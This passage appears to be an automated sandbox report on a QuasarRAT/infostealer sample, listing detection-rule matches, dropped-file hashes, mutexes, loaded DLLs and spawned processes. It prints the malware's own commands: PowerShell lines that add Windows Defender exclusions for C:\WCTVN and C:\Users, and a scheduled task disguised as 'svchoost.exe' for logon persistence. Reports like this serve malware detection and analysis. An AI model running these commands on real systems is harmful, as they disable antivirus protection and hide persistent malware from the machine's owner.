                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9BD27C1627_2_00007FFD9BD27C16
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9BD2EB2927_2_00007FFD9BD2EB29
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9BD33AF927_2_00007FFD9BD33AF9
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9BD2CAD527_2_00007FFD9BD2CAD5
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9BD1927127_2_00007FFD9BD19271
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9BD3923027_2_00007FFD9BD39230
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9BD28A0F27_2_00007FFD9BD28A0F
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9BD2B85127_2_00007FFD9BD2B851
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9BD1AFDD27_2_00007FFD9BD1AFDD
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9BD19FD027_2_00007FFD9BD19FD0
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9BD2FE8027_2_00007FFD9BD2FE80
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9BD155D627_2_00007FFD9BD155D6
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9BD1621F27_2_00007FFD9BD1621F
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9BE3232127_2_00007FFD9BE32321
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe 0502A8DA4A9F46A7375766B83D181AA9F38E9969B10801F80736A3598410A281
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\SubDir\Client.exe 0502A8DA4A9F46A7375766B83D181AA9F38E9969B10801F80736A3598410A281
                  Source: Joe Sandbox ViewDropped File: C:\WCTVN\mmytljldrgl.exe 0502A8DA4A9F46A7375766B83D181AA9F38E9969B10801F80736A3598410A281
                  Source: 24.0.mmytljldrgl.exe.450000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                  Source: 24.0.mmytljldrgl.exe.450000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 24.0.mmytljldrgl.exe.450000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe, type: DROPPEDMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe, type: DROPPEDMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPEDMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPEDMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                  Source: C:\WCTVN\mmytljldrgl.exe, type: DROPPEDMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                  Source: C:\WCTVN\mmytljldrgl.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: C:\WCTVN\mmytljldrgl.exe, type: DROPPEDMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@49/15@3/4
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4464:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeMutant created: \Sessions\1\BaseNamedObjects\Local\cf3988ab-2fd9-4544-a16f-9faa71eb5bac
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ulrrcajd.o5d.ps1Jump to behavior
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeReversingLabs: Detection: 21%
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeVirustotal: Detection: 26%
                  Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe"
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'"
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\WCTVN\mmytljldrgl.exe "C:\WCTVN\mmytljldrgl.exe"
                  Source: C:\WCTVN\mmytljldrgl.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\WCTVN\mmytljldrgl.exeProcess created: C:\Users\user\AppData\Roaming\SubDir\Client.exe "C:\Users\user\AppData\Roaming\SubDir\Client.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\SubDir\Client.exe C:\Users\user\AppData\Roaming\SubDir\Client.exe
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'"Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess created: C:\WCTVN\mmytljldrgl.exe "C:\WCTVN\mmytljldrgl.exe" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /fJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeProcess created: C:\Users\user\AppData\Roaming\SubDir\Client.exe "C:\Users\user\AppData\Roaming\SubDir\Client.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /fJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
